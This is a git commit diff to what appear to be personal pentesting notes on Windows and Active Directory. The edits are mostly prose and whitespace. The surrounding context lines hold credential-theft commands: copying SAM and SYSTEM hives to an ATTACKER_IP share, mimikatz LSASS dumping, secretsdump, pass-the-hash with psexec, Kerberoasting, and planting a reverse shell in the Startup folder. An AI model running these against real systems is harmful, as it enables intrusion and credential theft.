more info
This commit is contained in:
parent
ccaa96dab5
commit
c78967a9a9
|
|
@ -1,4 +1,10 @@
|
||||||
# AS-Rep Roating
|
# AS-Rep Roasting
|
||||||
|
|
||||||
|
AS-REP Roasting targets account for which preauthentication is disabled.
|
||||||
|
This means `DONT_REQUIRE_PREAUTH` for an account is enabled, and the DC skips
|
||||||
|
the verification step. After event type `4768` the `Pre_Authentication_Type=0`
|
||||||
|
and event code `4769` and `4624` is never triggered.
|
||||||
|
A service can be requested without any password check.
|
||||||
|
|
||||||
AS-Rep Roasting dumps user accounts which did not enable pre-authentication.
|
AS-Rep Roasting dumps user accounts which did not enable pre-authentication.
|
||||||
This is somewhat similar to Kerberoasting but includes user accounts as well.
|
This is somewhat similar to Kerberoasting but includes user accounts as well.
|
||||||
|
|
|
||||||
|
|
@ -27,6 +27,7 @@ Get-WinEvent -FilterHashTable @{LogName='<Category>';ID='<Event IDs>'} | fl
|
||||||
|
|
||||||
* **1**: Process Creation (Applications & Services -> Microsoft -> Windows ->
|
* **1**: Process Creation (Applications & Services -> Microsoft -> Windows ->
|
||||||
Sysmon -> Operational)
|
Sysmon -> Operational)
|
||||||
|
* **10**: ProcessAccess, Sysmon event where one process opens a handle to another process
|
||||||
* **4688**: Process Creation (Windows Logs -> Security)
|
* **4688**: Process Creation (Windows Logs -> Security)
|
||||||
|
|
||||||
### Files
|
### Files
|
||||||
|
|
|
||||||
|
|
@ -145,7 +145,7 @@ sc start TheService
|
||||||
|
|
||||||
### Startup Application
|
### Startup Application
|
||||||
|
|
||||||
* Put reverse shell instead of an executable inside `C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup`
|
* Put reverse shell instead of an executable inside `C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup`
|
||||||
|
|
||||||
### Password Mining
|
### Password Mining
|
||||||
|
|
||||||
|
|
@ -184,7 +184,7 @@ C:\inetpub\wwwroot\web.config
|
||||||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
|
||||||
```
|
```
|
||||||
|
|
||||||
### Putty
|
### Putty
|
||||||
|
|
||||||
* Saved proxy password credentials may be found via
|
* Saved proxy password credentials may be found via
|
||||||
```sh
|
```sh
|
||||||
|
|
@ -294,7 +294,7 @@ secretsdump.py -sam sam.hive -system system.hive LOCAL
|
||||||
hashdump
|
hashdump
|
||||||
```
|
```
|
||||||
|
|
||||||
* Use pass the hash to login
|
* Use pass the hash to login
|
||||||
```sh
|
```sh
|
||||||
psexec.py -hashes <hash> administrator@$TARGET_IP
|
psexec.py -hashes <hash> administrator@$TARGET_IP
|
||||||
```
|
```
|
||||||
|
|
@ -314,7 +314,7 @@ copy cmd.exe utilman.exe
|
||||||
* It is a rouge potato
|
* It is a rouge potato
|
||||||
* Execute process as another user
|
* Execute process as another user
|
||||||
* Service accounts operate through impersonation
|
* Service accounts operate through impersonation
|
||||||
* Check privileges via `whoami /priv` for these
|
* Check privileges via `whoami /priv` for these
|
||||||
* __Object Exporter Identifier (OXID)__ is executed as via DCOM as a resolver on port 135 to socket of attacker
|
* __Object Exporter Identifier (OXID)__ is executed as via DCOM as a resolver on port 135 to socket of attacker
|
||||||
```sh
|
```sh
|
||||||
socat tcp-listen:135 reuseaddr,fork tcp:$TARGET_IP:1234
|
socat tcp-listen:135 reuseaddr,fork tcp:$TARGET_IP:1234
|
||||||
|
|
@ -324,12 +324,14 @@ socat tcp-listen:135 reuseaddr,fork tcp:$TARGET_IP:1234
|
||||||
|
|
||||||
### Volume Shadow Copy Service
|
### Volume Shadow Copy Service
|
||||||
|
|
||||||
* Take a look at the volumes at
|
Take a look at the volumes at
|
||||||
|
|
||||||
```sh
|
```sh
|
||||||
vssadmin list shadows
|
vssadmin list shadows
|
||||||
```
|
```
|
||||||
|
|
||||||
* Copy `sam` and `system` from the shadow copy
|
Copy `sam` and `system` from the shadow copy
|
||||||
|
|
||||||
```sh
|
```sh
|
||||||
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\sam \\ATTACKER_IP\
|
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\sam \\ATTACKER_IP\
|
||||||
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system \\ATTACKER_IP\
|
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system \\ATTACKER_IP\
|
||||||
|
|
@ -337,10 +339,14 @@ copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\sys
|
||||||
|
|
||||||
### Dump LSASS
|
### Dump LSASS
|
||||||
|
|
||||||
* If administrator permissions are gained, a dump file can be created by opening the task manager and right clicking `lsass.exe` -> `creat dumpfile`
|
LSASS contains multiple different credential types like NTLM password hashes,
|
||||||
|
active krb session tickets, plaintext passwords and cached domain credentials.
|
||||||
|
|
||||||
|
* If administrator permissions are gained, a dump file can be created by opening the task manager and right-clicking `lsass.exe` -> `creat dumpfile`
|
||||||
* Use `procdump.exe` from sysinternal suite as an alternative to `tskmgr.exe`
|
* Use `procdump.exe` from sysinternal suite as an alternative to `tskmgr.exe`
|
||||||
|
|
||||||
* Extract the dump via mimikatz
|
* Extract the dump via mimikatz
|
||||||
|
|
||||||
```sh
|
```sh
|
||||||
privilege::debug
|
privilege::debug
|
||||||
sekurlsa::logonpasswords
|
sekurlsa::logonpasswords
|
||||||
|
|
@ -387,7 +393,7 @@ sekurlsa::credman
|
||||||
### Ntdsutil
|
### Ntdsutil
|
||||||
|
|
||||||
* If administrative permissions on the DC have been gained this can be done
|
* If administrative permissions on the DC have been gained this can be done
|
||||||
* Used to maintain the AD database, delete objects, snapshotting, set Directory Service Restore Mode (DSRM)
|
* Used to maintain the AD database, delete objects, snapshotting, set Directory Service Restore Mode (DSRM)
|
||||||
|
|
||||||
|
|
||||||
#### Locally extracting ntds.dit
|
#### Locally extracting ntds.dit
|
||||||
|
|
@ -411,7 +417,7 @@ secretsdump.py -security ./SECURITY -system ./SYSTEM -ntds ./ntds.dit local
|
||||||
|
|
||||||
#### Remotely dumping ntds
|
#### Remotely dumping ntds
|
||||||
|
|
||||||
* Needs the following AD credentials
|
* Needs the following AD credentials
|
||||||
* Replicating Directory Changes
|
* Replicating Directory Changes
|
||||||
* Replicating Directory Changes All
|
* Replicating Directory Changes All
|
||||||
* Replicating Directory Changes in Filtered Set
|
* Replicating Directory Changes in Filtered Set
|
||||||
|
|
@ -469,7 +475,7 @@ net user <GroupMemberUsername>
|
||||||
GetUserSPNs.py -dc-ip $DC_IP <domain>/<user>
|
GetUserSPNs.py -dc-ip $DC_IP <domain>/<user>
|
||||||
```
|
```
|
||||||
|
|
||||||
* Take a look at `Name` in the output and use it to query a TGS ticket
|
* Take a look at `Name` in the output and use it to query a TGS ticket
|
||||||
```sh
|
```sh
|
||||||
GetUserSPNs.py -dc-ip $DC_IP <domain>/<user> -request-user <SPN>
|
GetUserSPNs.py -dc-ip $DC_IP <domain>/<user> -request-user <SPN>
|
||||||
```
|
```
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue